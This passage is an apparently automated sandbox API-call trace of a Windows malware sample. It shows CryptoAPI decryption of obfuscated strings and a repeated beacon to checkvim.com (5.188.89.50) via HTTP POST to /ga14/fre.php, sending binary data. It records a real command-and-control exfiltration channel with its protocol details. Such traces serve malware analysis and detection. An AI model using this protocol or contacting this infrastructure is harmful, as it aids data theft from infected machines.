pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0236.299] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0236.299] CryptSetKeyParam (hKey=0x87e330, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0236.299] GetProcessHeap () returned 0x840000 [0236.299] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0236.300] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0236.300] CryptDecrypt (in: hKey=0x87e330, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f758, pdwDataLen=0x19f9a4 | out: pbData=0x87f758, pdwDataLen=0x19f9a4) returned 1 [0236.301] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0236.301] CryptDestroyKey (hKey=0x87e330) returned 1 [0236.302] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0236.302] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0236.302] GetProcessHeap () returned 0x840000 [0236.302] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x872af8 [0236.303] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0236.303] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0236.304] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0236.304] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0236.305] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0236.305] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0236.305] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0236.306] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0236.306] GetProcessHeap () returned 0x840000 [0236.306] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871178 [0236.306] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0236.306] GetProcessHeap () returned 0x840000 [0236.306] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871178 | out: hHeap=0x840000) returned 1 [0236.306] GetProcessHeap () returned 0x840000 [0236.306] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x872af8 | out: hHeap=0x840000) returned 1 [0236.306] GetProcessHeap () returned 0x840000 [0236.306] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f758 | out: hHeap=0x840000) returned 1 [0236.306] GetProcessHeap () returned 0x840000 [0236.306] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f5f0 [0236.307] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0236.311] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0236.316] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0236.316] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f930) returned 1 [0236.323] GetProcessHeap () returned 0x840000 [0236.323] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0236.323] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0236.324] CryptImportKey (in: hProv=0x86f930, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e7f0) returned 1 [0236.324] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0236.325] CryptSetKeyParam (hKey=0x87e7f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0236.326] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0236.326] CryptSetKeyParam (hKey=0x87e7f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0236.326] GetProcessHeap () returned 0x840000 [0236.326] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0236.327] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0236.327] CryptDecrypt (in: hKey=0x87e7f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f5f0, pdwDataLen=0x19f9a4 | out: pbData=0x87f5f0, pdwDataLen=0x19f9a4) returned 1 [0236.328] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0236.328] CryptDestroyKey (hKey=0x87e7f0) returned 1 [0236.329] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0236.329] CryptReleaseContext (hProv=0x86f930, dwFlags=0x0) returned 1 [0236.329] GetProcessHeap () returned 0x840000 [0236.329] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0236.330] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0236.330] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0236.331] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0236.331] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0236.332] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0236.332] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0236.333] GetProcessHeap () returned 0x840000 [0236.333] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871470 [0236.333] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8713f8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c20*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0236.336] GetProcessHeap () returned 0x840000 [0236.336] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c78 [0236.336] socket (af=2, type=1, protocol=6) returned 0x330 [0236.336] connect (s=0x330, name=0x878c20*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0236.407] FreeAddrInfoW (pAddrInfo=0x8713f8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c20*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0236.407] GetProcessHeap () returned 0x840000 [0236.407] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f688 [0236.407] GetProcessHeap () returned 0x840000 [0236.407] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0236.408] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0236.409] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0236.409] GetProcessHeap () returned 0x840000 [0236.409] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0236.409] GetProcessHeap () returned 0x840000 [0236.409] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0236.409] GetProcessHeap () returned 0x840000 [0236.409] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fcb0 [0236.409] GetProcessHeap () returned 0x840000 [0236.409] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0236.410] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0236.411] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0236.411] GetProcessHeap () returned 0x840000 [0236.411] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0236.411] GetProcessHeap () returned 0x840000 [0236.411] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0236.411] send (s=0x330, buf=0x873a58*, len=237, flags=0) returned 237 [0236.411] send (s=0x330, buf=0x87eb58*, len=159, flags=0) returned 159 [0236.412] GetProcessHeap () returned 0x840000 [0236.412] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0236.412] recv (in: s=0x330, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0236.771] GetProcessHeap () returned 0x840000 [0236.772] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0236.772] GetProcessHeap () returned 0x840000 [0236.772] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fcb0 | out: hHeap=0x840000) returned 1 [0236.772] GetProcessHeap () returned 0x840000 [0236.772] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0236.772] GetProcessHeap () returned 0x840000 [0236.772] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f688 | out: hHeap=0x840000) returned 1 [0236.772] closesocket (s=0x330) returned 0 [0236.772] GetProcessHeap () returned 0x840000 [0236.772] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c78 | out: hHeap=0x840000) returned 1 [0236.772] GetProcessHeap () returned 0x840000 [0236.772] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0236.772] GetProcessHeap () returned 0x840000 [0236.773] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f5f0 | out: hHeap=0x840000) returned 1 [0236.773] GetProcessHeap () returned 0x840000 [0236.773] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871470 | out: hHeap=0x840000) returned 1 [0236.773] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x1320) returned 0x330 [0236.774] Sleep (dwMilliseconds=0xea60) [0236.776] GetProcessHeap () returned 0x840000 [0236.776] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f950 [0236.776] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0236.777] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0236.783] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0236.783] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0236.791] GetProcessHeap () returned 0x840000 [0236.791] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0236.791] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0236.792] CryptImportKey (in: hProv=0x86f688, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e8b0) returned 1 [0236.793] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0236.793] CryptSetKeyParam (hKey=0x87e8b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0236.794] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0236.794] CryptSetKeyParam (hKey=0x87e8b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0236.794] GetProcessHeap () returned 0x840000 [0236.794] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0236.795] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0236.795] CryptDecrypt (in: hKey=0x87e8b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f950, pdwDataLen=0x19f9a4 | out: pbData=0x87f950, pdwDataLen=0x19f9a4) returned 1 [0236.795] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0236.796] CryptDestroyKey (hKey=0x87e8b0) returned 1 [0236.796] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0236.797] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0236.797] GetProcessHeap () returned 0x840000 [0236.797] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x872af8 [0236.797] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0236.798] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0236.798] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0236.799] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0236.799] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0236.800] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0236.801] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0236.801] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0236.801] GetProcessHeap () returned 0x840000 [0236.801] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871498 [0236.801] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0236.801] GetProcessHeap () returned 0x840000 [0236.801] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871498 | out: hHeap=0x840000) returned 1 [0236.801] GetProcessHeap () returned 0x840000 [0236.801] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x872af8 | out: hHeap=0x840000) returned 1 [0236.801] GetProcessHeap () returned 0x840000 [0236.801] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f950 | out: hHeap=0x840000) returned 1 [0236.801] GetProcessHeap () returned 0x840000 [0236.801] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fea8 [0236.802] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0236.803] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0236.811] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0236.811] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0236.818] GetProcessHeap () returned 0x840000 [0236.818] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0236.819] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0236.819] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e870) returned 1 [0236.820] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0236.820] CryptSetKeyParam (hKey=0x87e870, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0236.821] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0236.821] CryptSetKeyParam (hKey=0x87e870, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0236.821] GetProcessHeap () returned 0x840000 [0236.821] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0236.821] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0236.822] CryptDecrypt (in: hKey=0x87e870, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fea8, pdwDataLen=0x19f9a4 | out: pbData=0x87fea8, pdwDataLen=0x19f9a4) returned 1 [0236.823] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0236.823] CryptDestroyKey (hKey=0x87e870) returned 1 [0236.823] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0236.824] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0236.824] GetProcessHeap () returned 0x840000 [0236.824] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0236.826] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0236.826] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0236.827] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0236.827] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0236.828] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0236.828] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0236.828] GetProcessHeap () returned 0x840000 [0236.828] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871218 [0236.828] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871330*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b48*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0236.830] GetProcessHeap () returned 0x840000 [0236.830] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871bb8 [0236.830] socket (af=2, type=1, protocol=6) returned 0x334 [0236.830] connect (s=0x334, name=0x878b48*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0236.952] FreeAddrInfoW (pAddrInfo=0x871330*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b48*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0236.952] GetProcessHeap () returned 0x840000 [0236.952] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f710 [0236.952] GetProcessHeap () returned 0x840000 [0236.952] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0236.953] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0236.954] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0236.954] GetProcessHeap () returned 0x840000 [0236.954] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0236.954] GetProcessHeap () returned 0x840000 [0236.954] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0236.954] GetProcessHeap () returned 0x840000 [0236.954] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f710 [0236.954] GetProcessHeap () returned 0x840000 [0236.954] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0236.955] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0236.955] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0236.955] GetProcessHeap () returned 0x840000 [0236.955] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0236.955] GetProcessHeap () returned 0x840000 [0236.955] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0236.955] send (s=0x334, buf=0x873a58*, len=237, flags=0) returned 237 [0236.956] send (s=0x334, buf=0x87eb58*, len=159, flags=0) returned 159 [0236.956] GetProcessHeap () returned 0x840000 [0236.956] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0236.956] recv (in: s=0x334, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0237.566] GetProcessHeap () returned 0x840000 [0237.566] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0237.566] GetProcessHeap () returned 0x840000 [0237.566] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f710 | out: hHeap=0x840000) returned 1 [0237.566] GetProcessHeap () returned 0x840000 [0237.566] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0237.566] GetProcessHeap () returned 0x840000 [0237.566] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f710 | out: hHeap=0x840000) returned 1 [0237.566] closesocket (s=0x334) returned 0 [0237.566] GetProcessHeap () returned 0x840000 [0237.566] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871bb8 | out: hHeap=0x840000) returned 1 [0237.566] GetProcessHeap () returned 0x840000 [0237.566] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0237.566] GetProcessHeap () returned 0x840000 [0237.566] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fea8 | out: hHeap=0x840000) returned 1 [0237.566] GetProcessHeap () returned 0x840000 [0237.566] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871218 | out: hHeap=0x840000) returned 1 [0237.567] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x1334) returned 0x334 [0237.568] Sleep (dwMilliseconds=0xea60) [0237.576] GetProcessHeap () returned 0x840000 [0237.576] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fd40 [0237.577] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0237.577] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0237.582] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0237.582] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0237.588] GetProcessHeap () returned 0x840000 [0237.588] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708d8 [0237.589] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0237.589] CryptImportKey (in: hProv=0x86f688, pbData=0x8708d8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e470) returned 1 [0237.590] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0237.590] CryptSetKeyParam (hKey=0x87e470, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0237.591] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0237.591] CryptSetKeyParam (hKey=0x87e470, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0237.591] GetProcessHeap () returned 0x840000 [0237.591] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708d8 | out: hHeap=0x840000) returned 1 [0237.591] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0237.601] CryptDecrypt (in: hKey=0x87e470, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fd40, pdwDataLen=0x19f9a4 | out: pbData=0x87fd40, pdwDataLen=0x19f9a4) returned 1 [0237.602] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0237.602] CryptDestroyKey (hKey=0x87e470) returned 1 [0237.602] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0237.603] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0237.603] GetProcessHeap () returned 0x840000 [0237.603] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0237.603] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0237.604] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0237.604] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0237.605] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0237.605] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0237.606] StrStrA 